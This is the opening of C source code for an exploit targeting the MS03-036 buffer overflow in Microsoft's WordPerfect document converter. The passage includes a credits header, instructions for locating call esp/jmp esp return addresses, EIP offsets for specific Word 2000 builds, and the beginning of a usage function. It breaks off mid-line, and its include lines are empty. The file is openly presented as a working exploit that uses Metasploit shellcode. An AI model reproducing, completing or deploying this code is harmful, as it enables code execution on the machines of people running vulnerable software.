/******************************************************************/ /* Microsoft WordPerfect Document Converter Buffer Overflow Exploit MS03-036 */ /* */ /* Exploit with several targets */ /* */ /* Find your own return address with : */ /* findhex dllname FF D4 (call esp) */ /* findhex dllname FF E4 (jmp esp) */ /* */ /* Credits : */ /* vulnerability : Yuji "The Ninja" Ukai */ /* findhex : Jason Jordan */ /* sk scan-associates.net */ /* shellcode : metasploit */ /* exploit : valgasu - RstAck */ /* */ /******************************************************************/ #include #include #include #include #pragma comment(lib,"ws2_32") /* eip offset for Word 2000 9.0.2812 */ #define EIP_OFFSET 1359 /* eip offset for Word 2000 9.0.4462 SR1 */ //#define EIP_OFFSET 1343 void usage(char *name) { printf("\n-- --\n"); printf("-- WordPerfect Document Converter Exploit --\n"); printf("-- --\n\n"); printf("Usage: %s